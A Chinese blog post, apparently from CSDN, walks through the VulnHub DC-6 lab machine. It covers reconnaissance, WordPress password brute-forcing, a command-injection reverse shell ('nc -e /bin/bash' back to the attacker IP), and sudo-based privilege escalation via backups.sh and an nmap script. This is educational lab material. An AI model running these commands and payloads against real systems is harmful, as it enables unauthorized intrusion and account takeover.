vulnhub-DC6 靶机实验

已于 2022-12-03 21:58:10 修改
阅读量499 收藏
点赞数
分类专栏: 安全渗透 文章标签: 服务器 linux 运维
于 2022-12-03 15:31:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64118193/article/details/128160872
版权

靶机下载

官网地址: https://download.vulnhub.com/dc/DC-6.zip
靶机文件下载后导入即可使用,靶机只有一个flag值, 类似DC2靶机
DC6靶机IP地址: 192.168.18.100
kali攻击机IP地址:192.168.18.128

①信息收集

#扫描存活主机
arp-scan  -l
#nmap扫描开放端口信息
nmap -A -p- 192.168.18.100

在这里插入图片描述开放端口2280,我们进行网站登陆
在这里插入图片描述无法登陆网站,我们进行修改hosts文件vim /etc/hosts
在这里插入图片描述网站登陆:http://192.168.18.100
在这里插入图片描述
目录扫描

dirsearch  --url  http://192.168.18.100

发现登陆网站 http://wordy/wp-admin
在这里插入图片描述

② 密码爆破

用户名扫描 wpscan --url http://wordy/ -e u
用户名保存到桌面 vi /root/Desktop/dc6_user
用户名 admin、mark、graham、sarah、jens

在这里插入图片描述尝试DC2爆破密码方式,使用cewl在桌面生成密码进行爆破 cewl http://wordy/ -w /root/Desktop/dc6_passwd.txt
用户名和密码进行爆破 wpscan --url http://wordy/ -U /root/Desktop/dc6_user -P /root/Desktop/dc6_passwd.txt
爆破失败,未爆破出密码
在这里插入图片描述下载DC6的官网上提到

在这里插入图片描述生成密码cat /usr/share/wordlists/rockyou.txt | grep k01 > /root/Desktop/dc-6pass.txt
密码爆破 wpscan --url http://wordy/ -U /root/Desktop/dc6_user -P /root/Desktop/passwords.txt
在这里插入图片描述网站登陆用户名:mark 密码: helpdesk01 ,点击lookup执行该命令

在这里插入图片描述

③漏洞利用

searchsploit activity monitor
find  / -name 45274.html
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html 
cat 45274.html

在这里插入图片描述在这里插入图片描述

④反弹shell

#kali机上进行监听
nc -nlvp  4444
#登陆浏览器使用Burpsuite修改参数进行反弹
127.0.0.1 | nc -e /bin/bash 192.168.18.128 4444
#获得交互式命令
python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

⑤信心收集

找到一个things-to-do.txt文件

cd  /home
ls -la  /home/graham
ls  -la  /home/jens
ls -la  /home/mark
ls -la /home/mark/stuff
cat /home/mark/stuff/things-to-do.txt

在这里插入图片描述得到用户信息 用户名graham 密码GSo7isUM1D4,我们进行切换用户

cat /home/mark/stuff/things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

⑤用户提权

切换用户su graham,查看提权信息sudo -l
在这里插入图片描述可以直接执行backups.sh backups.sh文件写入/bin/bash,然后以jens执行该脚本

具体步骤:
先进入到对应路径:cd /home/jens
把/bin/bash追加到这个文件:echo '/bin/bash' >> backups.sh
切换身份:sudo -u jens ./backups.sh
在这里插入图片描述身份切换为jens
切换用户jens,查看提权信息sudo -l
在这里插入图片描述
nmap提权
进入/tmp下面 nmap--script 参数可以执行脚本

echo 'os.execute("/bin/bash")'>getroot.sh
sudo nmap --script=getroot.sh

在这里插入图片描述

flag获取
在这里插入图片描述

K.A.L
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HAProxy搭建web集群
LiuHuan303的博客
11-22 2395
目录 一,HAProxy介绍 1,HAProxy简介 2,HAProxy的主要特性 3,HAProxy常见负载均衡策略 4,LVS、Nginx、HAproxy的区别 二,配置HAProxy+Nginx负载均衡 三,HAProxy日志管理 一,HAProxy介绍 1,HAProxy简介 HAProxy是法国开发者威利塔罗(Willy Tarreau)在2000年使用C语言编写的自由及开放源代码软件,其提供高可用性,负载均衡,以及基于TCP和HTTP的应用程序代理。HProxy非常适用于并发
靶机实操:vulnhub-DC2
不想当脚本小子的脚本小子
12-01 261
最近练手的就用vulnhub上面的靶机来玩一玩,一来可以锻炼自己的能力,二来可以举一反三,培养自己的思路,在这里我奉劝各位初学者,一定要动手实操,只有在做的过程中才能够记住你所学的东西。话不多说,今天先来DC2.我这里主要是分享我的一些实验过程以及自己的思路与总结。 首先境安装好以后先哐哐哐各来一通: 开放了80,7744端口,对这个7744端口还挺有兴趣,一会看看有没有什么能够自己操作的地方 wapplyzer是一款火狐插件,亲测好用,发现了wordpress,这个时候就想着一会...
centos7.8安装oralce11g
zhangxm_qz的博客
02-13 936
为了熟悉rman备份操作,参照大神的博客在centos中安装了一套oracle11g,将安装步骤记录如下。
k8s集群环境的搭建
小明程序猿
07-25 798
k8s部署,搭建
GitLab服务器修改IP地址为指定值
weixin_40876882的博客
08-13 329
原因:gitlab克隆的IP地址要修改 方法:vim /etc/gitlab/gitlab.rb 假如要修改IP地址为:192.168.18.100 找到并修改为 external_url 'http://192.168.18.100' 重启GitLab gitlab-ctl restart
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
K8s多节点部署详细步骤,附UI界面的搭建
CYQ419的博客
02-09 1612
K8s多节点部署 需要准备的环境: 6台centos7设备:192.168.1.11 master01192.168.1.12 node1192.168.1.13 node2192.168.1.14 master02192.168.1.15 lb1192.168.1.16 lb2VIP:192.168.1.100 实验步骤: 1:自签ETCD证书 2:E...
DNS域名解析服务详解
LiuHuan303的博客
10-07 1700
一,DNS域名解析基础 1,DNS系统的作用 正向解析:根据域名查找对应的IP地址 反向解析:根据IP地址查找对应的域名 DNS系统的分布式数据结构 根. 根域名DNS服务器:专门负责根域名 IPv4的根名称服务器:全球共13个负责解析根域的DNS服务器,美国10个,英国1,瑞典1,日本1 IPv6的根名称服务器:全球共25个,中国1主3从,美国1主2从 一级DNS服务器:专门负责一级域名的解析(一般代表一种类型的组织机构或国家地区) .com(工商 企业) .net(网络...
keepalived基本应用解析(转)
guo_yang的博客
04-25 230
概念简单认知: Keepalived:它的诞生最初是为ipvs(一些服务,内核中的一些规则)提供高可用性的,最初最主要目的是能够自主调用ipvsadm来生成规则,并且能够自动实现将用户访问的地址转移到其他节点上进行实现的。 Keepalived:核心包含两个ckeckers和VRRP协议。 ckeckers:检查服务检查reserved的健康状况的,基于脚本也可检查服务本身的健康状况。这里是...
Centos7基于bind安装DNS
make_progress的博客
05-24 395
1 功能使用 实现在局域网中使用 http://www.mason.com访问主机A。 在局域网实现DNS的正向解析和反向解析。正向解析是通过域名查找ip。反向解析是通过ip查找域名。 注意:如果仅仅在局域网里使用,不考虑安全性,可以省略下面配置bind-chroot和反向解析,仅仅配置bind即可。 2 安装bind # 使用yum安装bind,安装成功后会显示 Complete # BIND(Berkeley Internet Name Domain)是DNS服务器软件 yum ins.
Vulnhub靶机渗透测试实战(一):DC-1(入门)
热门推荐
weixin_41038469的博客
03-11 2万+
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/ 主机渗透系统: macOS10.13 安装好虚拟机后挂载Virtualbox运行 第一次进行渗透实战演练,打开虚拟机后发现需要登录密码,一脸懵逼。翻查网页上的介绍才知道,就是不...
Vulnhub靶机实战-Forensics
黑白的博客
01-18 1488
声明 好好学习,天天向上 搭建 vmware打开,网络和攻击机一样,桥接模式 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.152 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,很简单的两个端口 访问80 http://192.168.31.152 点一下右上角的get flag,真骚气 网站上图片好多呀,邮件查看源代码,发现images目录,访问一下 把这些图片都下载下来,看看fingerprint这个指纹
VulnHub:DC-4靶机实验
JC_xxx的博客
11-25 200
信息收集 主机发现 利用apr-scan或者nmap探测靶机的IP地址 arp-scan -l nmap 扫描开放端口及其服务
vulnhub-XXE Lab: 1靶机实验
桜的博客
03-29 350
vulnhub-XXE Lab: 1靶机实验 靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip 虚拟机设置为net模式 使用nmap探测下目标ip:192.168.124.136 网页是apache默认页面 使用kali枚举一下目录,扫出来一个robots.txt文件 访问http://192.168.124.136/robots.txt ...
Vulnhub系列】DC3
大方子
04-08 5088
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

K.A.L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值